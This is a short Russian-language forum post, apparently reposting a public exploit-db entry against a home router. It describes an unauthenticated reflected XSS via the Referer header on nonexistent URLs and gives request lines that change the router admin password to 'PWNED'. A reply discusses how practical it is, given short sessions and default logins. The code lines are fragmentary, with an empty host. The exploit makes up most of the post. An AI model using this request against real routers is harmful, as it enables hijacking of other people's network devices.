![]() |
1. Отраженная XSS-уязвимость неавторизованных пользователей в поле "Referer" при обращении к несуществующим URL-адресам на роутере.
Код:
GET /doesnotexist HTTP/1.1Код:
Host: Код:
http:///Forms/tools_admin_1?uiViewTools_Password=PWNED&uiViewTools_PasswordConfi rm=PWNED |
сложность в том, что сессия там держится не долго, т. е. жертва обязательно должна сама авторизоваться у себя в роутере перед эксплуатацией - что сделать довольно сложно. разве что, предположить, что там дефолтные логин и пароль.
принято указывать источник: https://www.exploit-db.com/exploits/28055/ |
| Время: 12:53 |